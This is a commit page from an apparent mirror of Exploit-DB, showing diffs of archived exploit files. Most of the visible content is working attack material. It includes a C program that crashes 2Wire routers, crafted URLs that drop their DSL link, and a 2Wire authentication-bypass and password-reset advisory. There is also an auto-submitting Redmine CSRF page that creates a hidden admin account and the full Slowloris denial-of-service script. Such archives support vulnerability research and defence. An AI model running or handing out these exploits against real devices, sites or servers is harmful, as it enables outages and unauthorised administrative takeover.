bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 05_20_2014

Browse source
This commit is contained in:
Offensive Security 2014-05-20 04:36:33 +00:00
parent 51cca24be3
commit 16eeac4edf
89 changed files with 3715 additions and 4306 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

403
files.csv
View file

File diff suppressed because it is too large Load diff

190
platforms/hardware/dos/2246.cpp
View file

@ -1,95 +1,95 @@
//Vulnerable:
//2Wire OfficePortal 0
//2Wire HomePortal 1500W
//2Wire HomePortal 100W
//2Wire HomePortal 100S
//2Wire HomePortal 1000W
//2Wire HomePortal 1000SW
//2Wire HomePortal 1000S
//2Wire HomePortal 1000
//2Wire HomePortal 0
////////////////////////////////// [ STARTING CODE ]
////////////////////////////////////////////////////
////
//// [ Explanation ] this PoC make an evil_request
//// and send to the server , when the server process
//// it the request fall him, AND THE MODEM WILL RESET!.
////
//// [ Note ] This Poc was coded using Dev-C++ 4.9.9.2
//// If you have any error with the librarys you need
//// include libws2_32.a at the project.
////
//// Enjoy it n_nU!..
//// Coded by preth00nker (using Mexican skill!)
#pragma comment(lib,"libws2_32.a")
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include "winsock2.h"
unsigned long dir;
char h[]="";
short port;
char badreq[]="";
int state;
int main(int argc, char *argv[])
{
printf("\n################################################\n");
printf("####\n");
printf("#### PoC of DoS 2wire_Gateway\n");
printf("#### By Preth00nker\n");
printf("#### http://www.mexhackteam.org\n");
printf("####\n");
printf("####\n\n");
if (argc<4){
printf("[Usage] %s $Host $Port $Variable\n",argv[0]);
printf("\n[I.E.] %s 192.168.1.254 80 PAGE\n",argv[0]);
return 0;
}
//Crear socket
WSADATA wsaData;
WSAStartup(MAKEWORD(2,2),&wsaData);
SOCKET wsck;
//Estructuras
struct sockaddr_in Wins;
struct hostent *target;
//Wins
Wins.sin_family=AF_INET;
Wins.sin_port=htons((short)atoi(argv[2]));
target=gethostbyname(argv[1]);
Wins.sin_addr.s_addr=inet_addr(inet_ntoa(*(struct in_addr *)target->h_addr));
//llamamos al socket
wsck=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,(int unsigned)NULL,(int unsigned)NULL,(int unsigned)NULL);
//Verifica por error
if (wsck==SOCKET_ERROR){printf("Error al crear el socket =!..");WSACleanup();return 0;}
printf("Socket creado correctamente!.. hWndl: %d",wsck);
//Conecta
if(WSAConnect(wsck,(SOCKADDR*)&Wins,sizeof(Wins),NULL,NULL,NULL,NULL)==SOCKET_ERROR){
WSACleanup();
return 0;
printf("\nError al conectar =!..");
}
printf("\nConectado!..");
//Make a bad query and send it ..Mwajuajua!..
strcat(badreq,"GET /xslt?");
strcat(badreq,argv[3]);
strcat(badreq,"=%0D%0A HTTP/1.0\r\n");
strcat(badreq,"Accept-Language: es-mx\r\n");
strcat(badreq,"User-Agent: MexHackTeam\r\n");
strcat(badreq,"Host: ");
strcat(badreq,argv[1]);
strcat(badreq, "\r\n\r\n\r\n");
send(wsck , badreq ,(int)strlen(badreq), 0);
printf("\nDatos Mandados!..");
//finalized
Sleep(100);
printf("\nThat's all, Check this out!...\n");
WSACleanup();
return 0;
}
//////////////////////////////////////////// [ EOF ]
////////////////////////////////////////////////////
// milw0rm.com [2006-08-22]
//Vulnerable:
//2Wire OfficePortal 0
//2Wire HomePortal 1500W
//2Wire HomePortal 100W
//2Wire HomePortal 100S
//2Wire HomePortal 1000W
//2Wire HomePortal 1000SW
//2Wire HomePortal 1000S
//2Wire HomePortal 1000
//2Wire HomePortal 0
////////////////////////////////// [ STARTING CODE ]
////////////////////////////////////////////////////
////
//// [ Explanation ] this PoC make an evil_request
//// and send to the server , when the server process
//// it the request fall him, AND THE MODEM WILL RESET!.
////
//// [ Note ] This Poc was coded using Dev-C++ 4.9.9.2
//// If you have any error with the librarys you need
//// include libws2_32.a at the project.
////
//// Enjoy it n_nU!..
//// Coded by preth00nker (using Mexican skill!)
#pragma comment(lib,"libws2_32.a")
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include "winsock2.h"
unsigned long dir;
char h[]="";
short port;
char badreq[]="";
int state;
int main(int argc, char *argv[])
{
printf("\n################################################\n");
printf("####\n");
printf("#### PoC of DoS 2wire_Gateway\n");
printf("#### By Preth00nker\n");
printf("#### http://www.mexhackteam.org\n");
printf("####\n");
printf("####\n\n");
if (argc<4){
printf("[Usage] %s $Host $Port $Variable\n",argv[0]);
printf("\n[I.E.] %s 192.168.1.254 80 PAGE\n",argv[0]);
return 0;
}
//Crear socket
WSADATA wsaData;
WSAStartup(MAKEWORD(2,2),&wsaData);
SOCKET wsck;
//Estructuras
struct sockaddr_in Wins;
struct hostent *target;
//Wins
Wins.sin_family=AF_INET;
Wins.sin_port=htons((short)atoi(argv[2]));
target=gethostbyname(argv[1]);
Wins.sin_addr.s_addr=inet_addr(inet_ntoa(*(struct in_addr *)target->h_addr));
//llamamos al socket
wsck=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,(int unsigned)NULL,(int unsigned)NULL,(int unsigned)NULL);
//Verifica por error
if (wsck==SOCKET_ERROR){printf("Error al crear el socket =!..");WSACleanup();return 0;}
printf("Socket creado correctamente!.. hWndl: %d",wsck);
//Conecta
if(WSAConnect(wsck,(SOCKADDR*)&Wins,sizeof(Wins),NULL,NULL,NULL,NULL)==SOCKET_ERROR){
WSACleanup();
return 0;
printf("\nError al conectar =!..");
}
printf("\nConectado!..");
//Make a bad query and send it ..Mwajuajua!..
strcat(badreq,"GET /xslt?");
strcat(badreq,argv[3]);
strcat(badreq,"=%0D%0A HTTP/1.0\r\n");
strcat(badreq,"Accept-Language: es-mx\r\n");
strcat(badreq,"User-Agent: MexHackTeam\r\n");
strcat(badreq,"Host: ");
strcat(badreq,argv[1]);
strcat(badreq, "\r\n\r\n\r\n");
send(wsck , badreq ,(int)strlen(badreq), 0);
printf("\nDatos Mandados!..");
//finalized
Sleep(100);
printf("\nThat's all, Check this out!...\n");
WSACleanup();
return 0;
}
//////////////////////////////////////////// [ EOF ]
////////////////////////////////////////////////////
// milw0rm.com [2006-08-22]

68
platforms/hardware/dos/7060.txt
View file

@ -1,34 +1,34 @@
2WIRE ROUTER DSL DENIAL OF SERVICE
VULNERABLE
Model: 1701HG, 1800HW, 2071HG, 2700HG Gateway
Firmware: v3.17.5, 3.7.1, 4.25.19, 5.29.51
The DSL connection of some 2wire routers is droped when a request to /xslt with the value %X where X is any non alfa numeric character.
PoC: (this can be set in an IMG tag or whatever)
http://gateway.2wire.net/xslt?page=%&
http://gateway.2wire.net/xslt?page=%@
http://gateway.2wire.net/xslt?page=%!
http://gateway.2wire.net/xslt?page=%+
http://gateway.2wire.net/xslt?page=%;
http://gateway.2wire.net/xslt?page=%'
http://gateway.2wire.net/xslt?page=%~
http://gateway.2wire.net/xslt?page=%*
http://gateway.2wire.net/xslt?page=%0
http://gateway.2wire.net/xslt?page=%9
http://gateway.2wire.net/xslt?page=%?
http://home...
etc...
hkm
hkm {@} hakim.ws
Greets: UNDERGROUND.ORG.MX, daemon, acid_java, beck, dex.
# milw0rm.com [2008-11-08]
2WIRE ROUTER DSL DENIAL OF SERVICE
VULNERABLE
Model: 1701HG, 1800HW, 2071HG, 2700HG Gateway
Firmware: v3.17.5, 3.7.1, 4.25.19, 5.29.51
The DSL connection of some 2wire routers is droped when a request to /xslt with the value %X where X is any non alfa numeric character.
PoC: (this can be set in an IMG tag or whatever)
http://gateway.2wire.net/xslt?page=%&
http://gateway.2wire.net/xslt?page=%@
http://gateway.2wire.net/xslt?page=%!
http://gateway.2wire.net/xslt?page=%+
http://gateway.2wire.net/xslt?page=%;
http://gateway.2wire.net/xslt?page=%'
http://gateway.2wire.net/xslt?page=%~
http://gateway.2wire.net/xslt?page=%*
http://gateway.2wire.net/xslt?page=%0
http://gateway.2wire.net/xslt?page=%9
http://gateway.2wire.net/xslt?page=%?
http://home...
etc...
hkm
hkm {@} hakim.ws
Greets: UNDERGROUND.ORG.MX, daemon, acid_java, beck, dex.
# milw0rm.com [2008-11-08]

162
platforms/hardware/remote/9422.txt
View file

@ -1,81 +1,81 @@
2WIRE GATEWAY AUTHENTICATION BYPASS & PASSWORD RESET (08/04/09)
==============================================================
DESCRIPTION
-----------------
There is an authentication bypass vulnerability in page=CD35_SETUP_01 that
allows you to set a new password even if the password was previously set.
By setting a new password with more than 512 characters the password gets
reset and next time you access the router you will be prompted for a new
password.
VULNERABLE
----------------
2Wire 2071 Gateway
2Wire 1800HW
2Wire 1701HG
Firmware
5.29.51
3.17.5
3.7.1
NOT VULNERABLE
--------------------
Firmware
5.29.135.5 or later
DISCLOSURE TIMELINE
-------------------------
03/27/2009 - 2wire Contacted no satisfactory response
07/11/2009 - Sent complete details to 2wire no response
07/17/2009 - Sent advisory with video demo to 2wire ticket status escalated, but no response
08/02/2009 - Made public @ Defcon 17
EXPLOIT/POC
-----------------
Authentication Bypass - just use this page to set a new password
http://gateway.2wire.net?xslt?page=CD35_SETUP_01
Video: http://www.hakim.ws/2wire/2wire_CD35_Bypass.ogv
Password Reset - using the same form but sending a password > 512 characters
http://gateway.2wire.net/xslt?PAGE=CD35_SETUP_01_POST&password1=hkmhkmhkmhkmhkm
hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm
hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkh
kmhkmhkmhkmhkmhkmhkmhkm&password2=hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm
hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm
hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkhkmhkmhkmhkmhkmhkmhkmhkm
Video: http://www.hakim.ws/2wire/2wire_CD35_Reset.ogv
GREETS
------------
sdc lightos pcp nitr0us 0xf alt3kx darko DeadSector Etal gwolf h4ckult1m4t3
hackerss hd k00l kaz Kbrown mendozaaaa nahual Napa nediam raza-mexicana roa
Setting sla.ckers thornmaker tr3w vandida vi0let xianur0 Yield
Comunidad Underground de Mexico : https://www.underground.org.mx
h k m
http://www.hakim.ws
# milw0rm.com [2009-08-12]
2WIRE GATEWAY AUTHENTICATION BYPASS & PASSWORD RESET (08/04/09)
==============================================================
DESCRIPTION
-----------------
There is an authentication bypass vulnerability in page=CD35_SETUP_01 that
allows you to set a new password even if the password was previously set.
By setting a new password with more than 512 characters the password gets
reset and next time you access the router you will be prompted for a new
password.
VULNERABLE
----------------
2Wire 2071 Gateway
2Wire 1800HW
2Wire 1701HG
Firmware
5.29.51
3.17.5
3.7.1
NOT VULNERABLE
--------------------
Firmware
5.29.135.5 or later
DISCLOSURE TIMELINE
-------------------------
03/27/2009 - 2wire Contacted no satisfactory response
07/11/2009 - Sent complete details to 2wire no response
07/17/2009 - Sent advisory with video demo to 2wire ticket status escalated, but no response
08/02/2009 - Made public @ Defcon 17
EXPLOIT/POC
-----------------
Authentication Bypass - just use this page to set a new password
http://gateway.2wire.net?xslt?page=CD35_SETUP_01
Video: http://www.hakim.ws/2wire/2wire_CD35_Bypass.ogv
Password Reset - using the same form but sending a password > 512 characters
http://gateway.2wire.net/xslt?PAGE=CD35_SETUP_01_POST&password1=hkmhkmhkmhkmhkm
hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm
hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkh
kmhkmhkmhkmhkmhkmhkmhkm&password2=hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm
hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm
hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh
kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk
mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkhkmhkmhkmhkmhkmhkmhkmhkm
Video: http://www.hakim.ws/2wire/2wire_CD35_Reset.ogv
GREETS
------------
sdc lightos pcp nitr0us 0xf alt3kx darko DeadSector Etal gwolf h4ckult1m4t3
hackerss hd k00l kaz Kbrown mendozaaaa nahual Napa nediam raza-mexicana roa
Setting sla.ckers thornmaker tr3w vandida vi0let xianur0 Yield
Comunidad Underground de Mexico : https://www.underground.org.mx
h k m
http://www.hakim.ws
# milw0rm.com [2009-08-12]

6
platforms/linux/local/141.c
View file

@ -45,6 +45,6 @@ int main( void )
fork();
return( 0 );
}
// milw0rm.com [2004-01-06]
}
// milw0rm.com [2004-01-06]

6
platforms/linux/local/142.c
View file

@ -135,6 +135,6 @@ int main(int argc, char **argv)
close(fd);
return 0;
}
// milw0rm.com [2004-01-07]
}
// milw0rm.com [2004-01-07]

6
platforms/linux/local/145.c
View file

@ -407,6 +407,6 @@ int main(void)
return 0;
}
// milw0rm.com [2004-01-15]
// milw0rm.com [2004-01-15]

6
platforms/linux/local/154.c
View file

@ -95,6 +95,6 @@ int main( void )
return( 0 );
}
// milw0rm.com [2004-02-18]
// milw0rm.com [2004-02-18]

6
platforms/linux/local/160.c
View file

@ -295,6 +295,6 @@ int main(int ac, char **av)
}
return 0;
}
// milw0rm.com [2004-03-01]
}
// milw0rm.com [2004-03-01]

9
platforms/linux/local/33395.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37277/info
Linux kernel is prone to a local privilege-escalation vulnerability because the software fails to verify access permissions.
Exploits may allow attackers to execute arbitrary code with kernel-level privileges and launch other attacks.
Successful exploits will result in the complete compromise of affected computers.
http://www.exploit-db.com/sploits/33395.tgz

37
platforms/linux/remote/33402.txt Executable file
View file

@ -0,0 +1,37 @@
source: http://www.securityfocus.com/bid/37322/info
Ruby on Rails is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain administrative actions, gain unauthorized access to the affected application, or delete certain data. Other attacks are also possible.
/**
* Redmine <= 0.8.6 CSRF Add Admin User Exploit
* Discovered by: p0deje (http://p0deje.blogspot.com)
* Application: http://www.redmine.org/wiki/redmine/Download
* SA: http://www.redmine.org/news/30
* Date: 13.11.2009
* Versions affected: <= 0.8.6
* Description: this is a simple exploit which exploits CSRF vulnerability in Redmine, it creates user account with adminstartive rights
*/
<html>
<body>
<form method=POST action="http://www.example.com/users/new">
<input style="display: none" type="text" value="hacker" size="25" name="user[login]" id="user_login"/>
<input style="display: none" type="text" value="hacker" size="30" name="user[firstname]" id="user_firstname"/>
<input style="display: none" type="text" value="hacker" size="30" name="user[lastname]" id="user_lastname"/>
<input style="display: none" type="text" value="hacker@hacker.com" size="30" name="user[mail]" id="user_mail"/>
<input style="display: none" type="password" size="25" name="password" id="password" value="hacker" />
<input style="display: none" type="password" size="25" name="password_confirmation" id="password_confirmation" value="hacker" />
<input style="display: none" type="checkbox" value="1" name="user[admin]" id="user_admin"/>
<input style="display: none" type="hidden" value="1" name="user[admin]"/>
<input style="display: none" type="submit" value="Create" id="commit" name="commit" />
</form>
<script>document.getElementById("commit").click();</script>
</body>
</html>
/**
* P.S. Actually, this vulnerability wasn&#039;t fixed in Redmine 0.8.7, because token was generated one time for all the pages and allthe users.
* Thus, you can add POST data with token of any user and exploit will be working again
*/

932
platforms/multiple/dos/8976.pl
View file

@ -1,466 +1,466 @@
#!/usr/bin/perl -w
use strict;
use IO::Socket::INET;
use IO::Socket::SSL;
use Getopt::Long;
use Config;
$SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors
print <<EOTEXT;
CCCCCCCCCCOOCCOOOOO888\@8\@8888OOOOCCOOO888888888\@\@\@\@\@\@\@\@\@8\@8\@\@\@\@888OOCooocccc::::
CCCCCCCCCCCCCCCOO888\@888888OOOCCCOOOO888888888888\@88888\@\@\@\@\@\@\@888\@8OOCCoococc:::
CCCCCCCCCCCCCCOO88\@\@888888OOOOOOOOOO8888888O88888888O8O8OOO8888\@88\@\@8OOCOOOCoc::
CCCCooooooCCCO88\@\@8\@88\@888OOOOOOO88888888888OOOOOOOOOOCCCCCOOOO888\@8888OOOCc::::
CooCoCoooCCCO8\@88\@8888888OOO888888888888888888OOOOCCCooooooooCCOOO8888888Cocooc:
ooooooCoCCC88\@88888\@888OO8888888888888888O8O8888OOCCCooooccccccCOOOO88\@888OCoccc
ooooCCOO8O888888888\@88O8OO88888OO888O8888OOOO88888OCocoococ::ccooCOO8O888888Cooo
oCCCCCCO8OOOCCCOO88\@88OOOOOO8888O888OOOOOCOO88888O8OOOCooCocc:::coCOOO888888OOCC
oCCCCCOOO88OCooCO88\@8OOOOOO88O888888OOCCCCoCOOO8888OOOOOOOCoc::::coCOOOO888O88OC
oCCCCOO88OOCCCCOO8\@\@8OOCOOOOO8888888OoocccccoCO8O8OO88OOOOOCc.:ccooCCOOOO88888OO
CCCOOOO88OOCCOOO8\@888OOCCoooCOO8888Ooc::...::coOO88888O888OOo:cocooCCCCOOOOOO88O
CCCOO88888OOCOO8\@\@888OCcc:::cCOO888Oc..... ....cCOOOOOOOOOOOc.:cooooCCCOOOOOOOOO
OOOOOO88888OOOO8\@8\@8Ooc:.:...cOO8O88c. . .coOOO888OOOOCoooooccoCOOOOOCOOOO
OOOOO888\@8\@88888888Oo:. . ...cO888Oc.. :oOOOOOOOOOCCoocooCoCoCOOOOOOOO
COOO888\@88888888888Oo:. .O8888C: .oCOo. ...cCCCOOOoooooocccooooooooCCCOO
CCCCOO888888O888888Oo. .o8Oo. .cO88Oo: :. .:..ccoCCCooCooccooccccoooooCCCC
coooCCO8\@88OO8O888Oo:::... .. :cO8Oc. . ..... :. .:ccCoooooccoooocccccooooCCC
:ccooooCO888OOOO8OOc..:...::. .co8\@8Coc::.. .... ..:cooCooooccccc::::ccooCCooC
.:::coocccoO8OOOOOOC:..::....coCO8\@8OOCCOc:... ....:ccoooocccc:::::::::cooooooC
....::::ccccoCCOOOOOCc......:oCO8\@8\@88OCCCoccccc::c::.:oCcc:::cccc:..::::coooooo
.......::::::::cCCCCCCoocc:cO888\@8888OOOOCOOOCoocc::.:cocc::cc:::...:::coocccccc
...........:::..:coCCCCCCCO88OOOO8OOOCCooCCCooccc::::ccc::::::.......:ccocccc:co
.............::....:oCCoooooCOOCCOCCCoccococc:::::coc::::....... ...:::cccc:cooo
..... ............. .coocoooCCoco:::ccccccc:::ccc::.......... ....:::cc::::coC
. . ... .... .. .:cccoCooc:.. ::cccc:::c:.. ......... ......::::c:cccco
. .. ... .. .. .. ..:...:cooc::cccccc:..... ......... .....:::::ccoocc
. . .. ..::cccc:.::ccoocc:. ........... .. . ..:::.:::::::ccco
Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client
EOTEXT
my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections );
my ( $cache, $httpready, $method, $ssl, $rand, $tcpto );
my $result = GetOptions(
'shost=s' => \$shost,
'dns=s' => \$host,
'httpready' => \$httpready,
'num=i' => \$connections,
'cache' => \$cache,
'port=i' => \$port,
'https' => \$ssl,
'tcpto=i' => \$tcpto,
'test' => \$test,
'timeout=i' => \$timeout,
'version' => \$version,
);
if ($version) {
print "Version 0.7\n";
exit;
}
unless ($host) {
print "Usage:\n\n\tperl $0 -dns [www.example.com] -options\n";
print "\n\tType 'perldoc $0' for help with options.\n\n";
exit;
}
unless ($port) {
$port = 80;
print "Defaulting to port 80.\n";
}
unless ($tcpto) {
$tcpto = 5;
print "Defaulting to a 5 second tcp connection timeout.\n";
}
unless ($test) {
unless ($timeout) {
$timeout = 100;
print "Defaulting to a 100 second re-try timeout.\n";
}
unless ($connections) {
$connections = 1000;
print "Defaulting to 1000 connections.\n";
}
}
my $usemultithreading = 0;
if ( $Config{usethreads} ) {
print "Multithreading enabled.\n";
$usemultithreading = 1;
use threads;
use threads::shared;
}
else {
print "No multithreading capabilites found!\n";
print "Slowloris will be slower than normal as a result.\n";
}
my $packetcount : shared = 0;
my $failed : shared = 0;
my $connectioncount : shared = 0;
srand() if ($cache);
if ($shost) {
$sendhost = $shost;
}
else {
$sendhost = $host;
}
if ($httpready) {
$method = "POST";
}
else {
$method = "GET";
}
if ($test) {
my @times = ( "2", "30", "90", "240", "500" );
my $totaltime = 0;
foreach (@times) {
$totaltime = $totaltime + $_;
}
$totaltime = $totaltime / 60;
print "This test could take up to $totaltime minutes.\n";
my $delay = 0;
my $working = 0;
my $sock;
if ($ssl) {
if (
$sock = new IO::Socket::SSL(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working = 1;
}
}
else {
if (
$sock = new IO::Socket::INET(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working = 1;
}
}
if ($working) {
if ($cache) {
$rand = "?" . int( rand(99999999999999) );
}
else {
$rand = "";
}
my $primarypayload =
"GET /$rand HTTP/1.1\r\n"
. "Host: $sendhost\r\n"
. "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
. "Content-Length: 42\r\n";
if ( print $sock $primarypayload ) {
print "Connection successful, now comes the waiting game...\n";
}
else {
print
"That's odd - I connected but couldn't send the data to $host:$port.\n";
print "Is something wrong?\nDying.\n";
exit;
}
}
else {
print "Uhm... I can't connect to $host:$port.\n";
print "Is something wrong?\nDying.\n";
exit;
}
for ( my $i = 0 ; $i <= $#times ; $i++ ) {
print "Trying a $times[$i] second delay: \n";
sleep( $times[$i] );
if ( print $sock "X-a: b\r\n" ) {
print "\tWorked.\n";
$delay = $times[$i];
}
else {
if ( $SIG{__WARN__} ) {
$delay = $times[ $i - 1 ];
last;
}
print "\tFailed after $times[$i] seconds.\n";
}
}
if ( print $sock "Connection: Close\r\n\r\n" ) {
print "Okay that's enough time. Slowloris closed the socket.\n";
print "Use $delay seconds for -timeout.\n";
exit;
}
else {
print "Remote server closed socket.\n";
print "Use $delay seconds for -timeout.\n";
exit;
}
if ( $delay < 166 ) {
print <<EOSUCKS2BU;
Since the timeout ended up being so small ($delay seconds) and it generally
takes between 200-500 threads for most servers and assuming any latency at
all... you might have trouble using Slowloris against this target. You can
tweak the -tcpto flag down to 1 second but it still may not build the sockets
in time.
EOSUCKS2BU
}
}
else {
print
"Connecting to $host:$port every $timeout seconds with $connections sockets:\n";
if ($usemultithreading) {
domultithreading($connections);
}
else {
doconnections( $connections, $usemultithreading );
}
}
sub doconnections {
my ( $num, $usemultithreading ) = @_;
my ( @first, @sock, @working );
my $failedconnections = 0;
$working[$_] = 0 foreach ( 1 .. $num ); #initializing
$first[$_] = 0 foreach ( 1 .. $num ); #initializing
while (1) {
$failedconnections = 0;
print "\t\tBuilding sockets.\n";
foreach my $z ( 1 .. $num ) {
if ( $working[$z] == 0 ) {
if ($ssl) {
if (
$sock[$z] = new IO::Socket::SSL(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working[$z] = 1;
}
else {
$working[$z] = 0;
}
}
else {
if (
$sock[$z] = new IO::Socket::INET(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working[$z] = 1;
$packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK
}
else {
$working[$z] = 0;
}
}
if ( $working[$z] == 1 ) {
if ($cache) {
$rand = "?" . int( rand(99999999999999) );
}
else {
$rand = "";
}
my $primarypayload =
"$method /$rand HTTP/1.1\r\n"
. "Host: $sendhost\r\n"
. "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
. "Content-Length: 42\r\n";
my $handle = $sock[$z];
if ($handle) {
print $handle "$primarypayload";
if ( $SIG{__WARN__} ) {
$working[$z] = 0;
close $handle;
$failed++;
$failedconnections++;
}
else {
$packetcount++;
$working[$z] = 1;
}
}
else {
$working[$z] = 0;
$failed++;
$failedconnections++;
}
}
else {
$working[$z] = 0;
$failed++;
$failedconnections++;
}
}
}
print "\t\tSending data.\n";
foreach my $z ( 1 .. $num ) {
if ( $working[$z] == 1 ) {
if ( $sock[$z] ) {
my $handle = $sock[$z];
if ( print $handle "X-a: b\r\n" ) {
$working[$z] = 1;
$packetcount++;
}
else {
$working[$z] = 0;
#debugging info
$failed++;
$failedconnections++;
}
}
else {
$working[$z] = 0;
#debugging info
$failed++;
$failedconnections++;
}
}
}
print
"Current stats:\tSlowloris has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n";
sleep($timeout);
}
}
sub domultithreading {
my ($num) = @_;
my @thrs;
my $i = 0;
my $connectionsperthread = 50;
while ( $i < $num ) {
$thrs[$i] =
threads->create( \&doconnections, $connectionsperthread, 1 );
$i += $connectionsperthread;
}
my @threadslist = threads->list();
while ( $#threadslist > 0 ) {
$failed = 0;
}
}
__END__
=head1 TITLE
Slowloris
=head1 VERSION
Version 0.7 Beta
=head1 DATE
06/17/2009
=head1 AUTHOR
RSnake <h@ckers.org> with threading from John Kinsella
=head1 ABSTRACT
Slowloris both helps identify the timeout windows of a HTTP server or Proxy server, can bypass httpready protection and ultimately performs a fairly low bandwidth denial of service. It has the added benefit of allowing the server to come back at any time (once the program is killed), and not spamming the logs excessively. It also keeps the load nice and low on the target server, so other vital processes don't die unexpectedly, or cause alarm to anyone who is logged into the server for other reasons.
=head1 AFFECTS
Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, Squid, others...?
=head1 NOT AFFECTED
IIS6.0, IIS7.0, lighthttpd, others...?
=head1 DESCRIPTION
Slowloris is designed so that a single machine (probably a Linux/UNIX machine since Windows appears to limit how many sockets you can have open at any given time) can easily tie up a typical web server or proxy server by locking up all of it's threads as they patiently wait for more data. Some servers may have a smaller tolerance for timeouts than others, but Slowloris can compensate for that by customizing the timeouts. There is an added function to help you get started with finding the right sized timeouts as well.
As a side note, Slowloris does not consume a lot of resources so modern operating systems don't have a need to start shutting down sockets when they come under attack, which actually in turn makes Slowloris better than a typical flooder in certain circumstances. Think of Slowloris as the HTTP equivalent of a SYN flood.
=head2 Testing
If the timeouts are completely unknown, Slowloris comes with a mode to help you get started in your testing:
=head3 Testing Example:
./slowloris.pl -dns www.example.com -port 80 -test
This won't give you a perfect number, but it should give you a pretty good guess as to where to shoot for. If you really must know the exact number, you may want to mess with the @times array (although I wouldn't suggest that unless you know what you're doing).
=head2 HTTP DoS
